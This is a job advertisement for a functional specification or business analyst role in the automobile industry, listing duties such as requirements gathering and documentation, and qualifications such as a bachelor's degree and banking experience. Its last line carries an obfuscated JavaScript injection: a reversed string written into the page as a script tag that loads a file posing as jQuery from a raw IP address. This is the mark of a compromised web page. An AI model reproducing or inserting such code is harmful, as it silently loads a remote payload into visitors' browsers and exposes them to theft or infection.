Industry : Automobile
– To work and plan the Functional Specification Documentation activities and deliverables with project team based on scope, delivery and timeline of the project.
– To identify, collect, evaluate and document business/user/system requirements into specifications (including functional, non-functional, data, interface, dependencies, constraints, assumptions, risk and other related items) for system development through working with various business users/stakeholders by conducting workshops/interviews/study ensuring that requirements map to the objective and scope of the project.
– To produce user/system requirements related documents for projects including diagrams, sitemaps/blueprint, wire frames, functionality, navigation flows, system/task flows, traceability matrix and others.
– To participate in the software development lifecycle supporting project implementation activities including design planning, user interface building, documentation, testing and training.
– To adhere to project implementation methodology for all projects.
– Undertakes other duties and responsibilities as may assigned by the project manager/team leader/Head of Project Management Office from time to time or as and when necessary for the effective realization of the project purpose.
QUALIFICATION AND EXPERIENCE:
– Candidate must possess at least a Bachelor’s Degree, Computer Science/Information Technology, Business Studies/Administration/Management or equivalent.
– At least 3 years working experience in the related fields is required for this position.
– Banking, Financial and/or Insurance working experience.
– Knowledge in Business Process Methodology.
– Experience working with IT Projects.
– Require good written and verbal English. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))